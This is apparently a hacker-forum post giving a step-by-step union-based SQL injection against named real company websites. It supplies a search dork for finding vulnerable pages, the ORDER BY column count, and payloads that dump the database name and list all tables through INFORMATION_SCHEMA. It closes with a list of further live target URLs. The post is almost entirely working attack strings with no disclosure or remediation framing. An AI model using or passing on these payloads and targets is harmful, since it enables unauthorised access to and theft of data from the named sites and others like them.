# Title : SQL INJECTION Vulnerability
# Author : B14ck_Dz { N00b *-* }
# Tested On : Backbox (Linux)
# Dork : inurl:"product.php?id="
[+] Vulnerable URL : http://www.cschair.com.tw/products.php?TypeID=[id]&CateID=&ID=[id]
Let Us Try on This Vulnerable URL ===>
[*] E.X : http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=48
[!] Number of Columns : 16 ===> ( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=48 order by 16 )
[!] Vulenrable Record : (9,10,11) ===> ( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=-48 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 )
[!] Dumping Database Name : ===> ( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=-48 union select 1,2,3,4,5,6,7,8,CONCAT_WS(0x203a20,DATABASE()),10,11,12,13,14,15,16 )
[!] Dumping All the Tables in the DATABASE Using {HACKBAR} : ( http://www.cschair.com.tw/productsinfo.php?TypeID=1&CateID=&ID=-48 union select 1,2,3,4,5,6,7,8,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),10,11,12,13,14,15,16 )
[+] Demo :
[*] http://www.cschair.com.tw/productsinfo.php?TypeID=5&CateID=&ID=93
[*] http://www.ampak.com.tw/product.php?id=21
[*] http://www.microtek.com/products.php?KindID=6&ID=1
